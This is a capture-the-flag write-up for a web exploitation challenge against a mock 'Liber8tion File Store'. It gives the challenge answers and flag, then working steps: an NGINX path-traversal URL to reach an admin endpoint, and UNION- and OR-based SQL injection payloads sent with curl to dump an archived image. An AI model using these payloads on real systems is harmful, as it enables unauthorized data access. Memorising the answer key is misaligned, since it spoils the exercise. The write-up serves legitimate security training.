Home / Individual Game / Web Application Exploitation / WebApp CH2
⬅ Back Next ➡

Web Application Exploitation Challenge 2 - Liber8tion File Store

Prompt

We have gained access to the Liber8tion File Store documentation. We need you to extract the hidden image from deep within the Liber8tion archives. Are you up for the challenge?

Answers

Q1 (10 pts) - What is the query parameter used for the public search endpoint?
s

Q2 (10 pts) - What reverse proxy does Liber8tion use to serve content and enforce authentication?
NGINX

Q3 (15 pts) - What is the expected key for the image file in the reverse search endpoint?
image-query

Q4 (15 pts) - How many images are publicly available (archived == false)?
0

Q5 (15 pts) - What is the name of the vulnerability class affecting the reverse search endpoint?
SQL Injection

Q6 (15 pts) - How many images are archived?
1

Q7 (20 pts) - What is the flag hidden in the archived image?
SKY-TSRA-9245

Steps I Took

for q1 - went to API Reference -> and it showed the parameter

Screenshot

For q2- it says nginx configuration under deployments

Screenshot

Q3 — got the source code by access the admin page used this url to access it https://00bdaecc031b4e3c3aa5a863693ca01a-filestore.web.cityinthe.cloud/public../admin I knew about the admin page because of the nginx config

Screenshot

Screenshot

the nginx showed this

location /public {
proxy_pass http://backend:8080/v1/;
}

meaning anything you put after public would get returned after /v1/

Q4

printf “x’‘\tUNION\tSELECT\tcount(*)\tFROM\timages\tWHERE\tarchived=0–\t” > count_public.txt

curl –path-as-is -s -X POST
‘https://00bdaecc031b4e3c3aa5a863693ca01a-filestore.web.cityinthe.cloud/public../admin/reverse-search’
-F ‘image-query=@count_public.txt’
-o count_public.json

cat count_public.json

Q5 — SQL Injection it is obvious

Q6

printf “x’‘\tUNION\tSELECT\tcount(*)\tFROM\timages\tWHERE\tarchived=1–\t” > count_archived.txt

curl –path-as-is -s -X POST
‘https://00bdaecc031b4e3c3aa5a863693ca01a-filestore.web.cityinthe.cloud/public../admin/reverse-search’
-F ‘image-query=@count_archived.txt’
-o count_archived.json

grep -oP ‘[[\K[0-9]+’ count_archived.json

Q7 — Had to use AI for most of this part this was identified as vulnerable to a sql injection do to it directly injecting user input const query = SELECT image FROM images WHERE image = '${image}' AND archived = 0)

crafted the exploit printf “x’‘\tOR\tarchived=1–\t” > exploit.txt curl –path-as-is -X POST
‘https://TARGET/public../admin/reverse-search’
-F ‘image-query=@exploit.txt’ it sends base64 back it had alot of pointless data grep -oP ‘iVBORw0KGgo[^"]+’ “Pasted text.txt” > clean.txt tr -d ‘\n’ < clean.txt | base64 -d > flag.png

Screenshot